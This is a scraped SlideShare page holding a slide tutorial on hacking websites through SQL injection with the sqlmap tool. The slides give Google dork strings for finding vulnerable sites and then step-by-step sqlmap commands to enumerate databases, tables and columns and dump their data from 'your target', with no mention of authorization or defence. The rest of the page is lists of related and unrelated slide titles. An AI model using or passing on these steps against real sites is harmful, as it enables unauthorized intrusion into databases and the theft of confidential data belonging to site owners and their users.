SlideShare a Scribd company logo
Privacy is Myth
</CybraryTech>
LOGO
Page  2
Hack Website using SQL Injection Attack
Most of the website on the internet today are
dynamic database driven website. But this also led
to some vulnerabilities in database. From these
vulnerabilities, SQL Injection is most dangerous and
common.
SQL Injection is a code injection method. In other words, An attacker injects
its malicious SQL Code in any field on website to exploit and retrieve
confidential information from database.
In this tutorial we will hack a website database by sql injection attack
using a popular sql injection tool named SQLMap.
Page  3
Requirements
 Download SQLMap. (Click Here)
 Get a SQL Injection Vulnerable Website. Use below google dorks to search
for SQLi vulnerable sites. Use these strings on google to find vulnerable
site.
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
Page  4
Step 1
 Open terminal and use below command to retrieve Database
Information of website.
sqlmap -u http://target.com/details.php?id=
 -u refers to the link of website. I am using a simple imaginary url
for the sake of this tutorial. You need to replace this url with your
chosen site url. There should be id= or = parameter in url of
website which denotes any specific column from database.
 Note:- Do Note Forget to Replace the target url in above
command with your target.
Page  5
Step 2
 After getting database information, execute this command to
get list of available databases on website.
sqlmap -u http://target.com/details.php?id= --dbs
 This command will give you list of Databases.
 --dbs option used to retrieve databases from website.
Page  6
Step 3
 After getting Database, its time to get Tables list.
sqlmap -u http://target.com/details.php?id= -D db_name --tables
 Replace db_name with the database name, of which you wants
to retrieve tables.
Page  7
Step 4
 Now that you got tables, You need to get columns in that
table.
sqlmap -u http://target.com/details.php?id= -D db_name -T
table_name --columns
 Replace table_name with your desired table in database.
Page  8
Step 5
 After getting columns, we are interested in getting the data
available in that column.
sqlmap -u http://target.com/details.php?id= -D db_name -T
table_name -C column_name --dump
 Replace the column_name with the name of column in table.
 --dump command is used to retrieve.
Subscribe and Share
CybraryTech.Co
mPrivacy is Myth
/ethicalhackingtutorialsway
Subscribe and Share
CybraryTech.Co
mPrivacy is Myth
/ethicalhackingtutorialsway

More Related Content

PDF
Newest topic of spider 20131016 in Buenos Aires Argentina
PPTX
File Recovery for Mac
PDF
semantics_documentationsbn
PDF
Htaccess file tutorial and tips
PDF
Technical SEO: .htaccess & 301 Redirects
PDF
Mid term &amp; final- preparation- student-review(Oracle)
PPTX
Stackato Presentation Techzone 2013
PPT
Rail3 intro 29th_sep_surendran
Newest topic of spider 20131016 in Buenos Aires Argentina
File Recovery for Mac
semantics_documentationsbn
Htaccess file tutorial and tips
Technical SEO: .htaccess & 301 Redirects
Mid term &amp; final- preparation- student-review(Oracle)
Stackato Presentation Techzone 2013
Rail3 intro 29th_sep_surendran

Viewers also liked (20)

DOCX
Письмо великої букви Т. Написання складів, слів і речень. Звуковий аналіз слів
PDF
Zora singh-commission-report
PPTX
3Com 3C6086
ODP
Mi dossier fotografico
PDF
SamselCV_1_17
PPSX
Los sintagmas
PPTX
Η καταστροφή της Σμύρνης
PDF
Pabellón de Alemania 6
PPSX
Complementos verbales
PDF
Dont Stop Believin
PPSX
La oración
DOC
INFORME DE COMUEDA, de fecha 22/05/2014 Asistencia a familias afectadas por l...
PPTX
Making a triangle
PPT
10. esterilización (2. embolsado y sellado)
PPTX
Evidencia de trabajo
PPTX
Portafolio de Trabajo_MTEM
DOCX
Agenda de Cultural de la semana de la madre y festejos patrios
PDF
Herramientas para desarrollar contenidos didácticos
PPTX
Herramientas de elaboración en la sala de clase
PPS
Convenciones, Reuniones y Eventos - Hotel Las Américas Resort
Письмо великої букви Т. Написання складів, слів і речень. Звуковий аналіз слів
Zora singh-commission-report
3Com 3C6086
Mi dossier fotografico
SamselCV_1_17
Los sintagmas
Η καταστροφή της Σμύρνης
Pabellón de Alemania 6
Complementos verbales
Dont Stop Believin
La oración
INFORME DE COMUEDA, de fecha 22/05/2014 Asistencia a familias afectadas por l...
Making a triangle
10. esterilización (2. embolsado y sellado)
Evidencia de trabajo
Portafolio de Trabajo_MTEM
Agenda de Cultural de la semana de la madre y festejos patrios
Herramientas para desarrollar contenidos didácticos
Herramientas de elaboración en la sala de clase
Convenciones, Reuniones y Eventos - Hotel Las Américas Resort

Similar to How to Hack Website using SQL Injection Attack (20)

PPTX
PPTX
Sqlmap
PPT
SQLMAP Tool Usage - A Heads Up
PDF
Important SQLMap commands
PPTX
Web application penetration using SQLMAP.
PDF
Sql injection manish file
PPTX
PPT
SQL Injection
PDF
SQL Injection
PPTX
Web hacking series part 3
PPTX
Sql injection - security testing
PPTX
Union based sql injection by Urdu Tutorials Point
PPTX
Sql injection
PDF
Sql injection
PPTX
SQL Injection Stegnography in Pen Testing
DOCX
Sql full tutorial
PPTX
sqlmap- using -kali -linux by-22011556-105.pptx
PPTX
Hacking Techniques
Sqlmap
SQLMAP Tool Usage - A Heads Up
Important SQLMap commands
Web application penetration using SQLMAP.
Sql injection manish file
SQL Injection
SQL Injection
Web hacking series part 3
Sql injection - security testing
Union based sql injection by Urdu Tutorials Point
Sql injection
Sql injection
SQL Injection Stegnography in Pen Testing
Sql full tutorial
sqlmap- using -kali -linux by-22011556-105.pptx
Hacking Techniques

Recently uploaded (20)

PPTX
INTERNET------BASICS-------UPDATED PPT PRESENTATION
PDF
Best Practices for Testing and Debugging Shopify Third-Party API Integrations...
PPTX
Job_Card_System_Styled_lorem_ipsum_.pptx
PPT
isotopes_sddsadsaadasdasdasdasdsa1213.ppt
PPT
tcp ip networks nd ip layering assotred slides
PDF
RPKI Status Update, presented by Makito Lay at IDNOG 10
PPTX
Power Point - Lesson 3_2.pptx grad school presentation
PDF
Slides PDF The World Game (s) Eco Economic Epochs.pdf
PDF
WebRTC in SignalWire - troubleshooting media negotiation
PPTX
Introduction about ICD -10 and ICD11 on 5.8.25.pptx
PDF
An introduction to the IFRS (ISSB) Stndards.pdf
PDF
Sims 4 Historia para lo sims 4 para jugar
PPTX
Introuction about ICD -10 and ICD-11 PPT.pptx
PDF
Introduction to the IoT system, how the IoT system works
PDF
💰 𝐔𝐊𝐓𝐈 𝐊𝐄𝐌𝐄𝐍𝐀𝐍𝐆𝐀𝐍 𝐊𝐈𝐏𝐄𝐑𝟒𝐃 𝐇𝐀𝐑𝐈 𝐈𝐍𝐈 𝟐𝟎𝟐𝟓 💰
PDF
SASE Traffic Flow - ZTNA Connector-1.pdf
PPTX
Digital Literacy And Online Safety on internet
PPTX
Funds Management Learning Material for Beg
PDF
Vigrab.top – Online Tool for Downloading and Converting Social Media Videos a...
PPTX
Introduction to Information and Communication Technology
INTERNET------BASICS-------UPDATED PPT PRESENTATION
Best Practices for Testing and Debugging Shopify Third-Party API Integrations...
Job_Card_System_Styled_lorem_ipsum_.pptx
isotopes_sddsadsaadasdasdasdasdsa1213.ppt
tcp ip networks nd ip layering assotred slides
RPKI Status Update, presented by Makito Lay at IDNOG 10
Power Point - Lesson 3_2.pptx grad school presentation
Slides PDF The World Game (s) Eco Economic Epochs.pdf
WebRTC in SignalWire - troubleshooting media negotiation
Introduction about ICD -10 and ICD11 on 5.8.25.pptx
An introduction to the IFRS (ISSB) Stndards.pdf
Sims 4 Historia para lo sims 4 para jugar
Introuction about ICD -10 and ICD-11 PPT.pptx
Introduction to the IoT system, how the IoT system works
💰 𝐔𝐊𝐓𝐈 𝐊𝐄𝐌𝐄𝐍𝐀𝐍𝐆𝐀𝐍 𝐊𝐈𝐏𝐄𝐑𝟒𝐃 𝐇𝐀𝐑𝐈 𝐈𝐍𝐈 𝟐𝟎𝟐𝟓 💰
SASE Traffic Flow - ZTNA Connector-1.pdf
Digital Literacy And Online Safety on internet
Funds Management Learning Material for Beg
Vigrab.top – Online Tool for Downloading and Converting Social Media Videos a...
Introduction to Information and Communication Technology

How to Hack Website using SQL Injection Attack

  • 2. Page  2 Hack Website using SQL Injection Attack Most of the website on the internet today are dynamic database driven website. But this also led to some vulnerabilities in database. From these vulnerabilities, SQL Injection is most dangerous and common. SQL Injection is a code injection method. In other words, An attacker injects its malicious SQL Code in any field on website to exploit and retrieve confidential information from database. In this tutorial we will hack a website database by sql injection attack using a popular sql injection tool named SQLMap.
  • 3. Page  3 Requirements  Download SQLMap. (Click Here)  Get a SQL Injection Vulnerable Website. Use below google dorks to search for SQLi vulnerable sites. Use these strings on google to find vulnerable site. archive.php?id= article.php?id= phpx?PageID basket.php?id= category.php?catid= category_list.php?id= categorydisplay.php?catid= checkout.php?cartid= checkout.php?UserID=
  • 4. Page  4 Step 1  Open terminal and use below command to retrieve Database Information of website. sqlmap -u http://target.com/details.php?id=  -u refers to the link of website. I am using a simple imaginary url for the sake of this tutorial. You need to replace this url with your chosen site url. There should be id= or = parameter in url of website which denotes any specific column from database.  Note:- Do Note Forget to Replace the target url in above command with your target.
  • 5. Page  5 Step 2  After getting database information, execute this command to get list of available databases on website. sqlmap -u http://target.com/details.php?id= --dbs  This command will give you list of Databases.  --dbs option used to retrieve databases from website.
  • 6. Page  6 Step 3  After getting Database, its time to get Tables list. sqlmap -u http://target.com/details.php?id= -D db_name --tables  Replace db_name with the database name, of which you wants to retrieve tables.
  • 7. Page  7 Step 4  Now that you got tables, You need to get columns in that table. sqlmap -u http://target.com/details.php?id= -D db_name -T table_name --columns  Replace table_name with your desired table in database.
  • 8. Page  8 Step 5  After getting columns, we are interested in getting the data available in that column. sqlmap -u http://target.com/details.php?id= -D db_name -T table_name -C column_name --dump  Replace the column_name with the name of column in table.  --dump command is used to retrieve.
  • 9. Subscribe and Share CybraryTech.Co mPrivacy is Myth /ethicalhackingtutorialsway
  • 10. Subscribe and Share CybraryTech.Co mPrivacy is Myth /ethicalhackingtutorialsway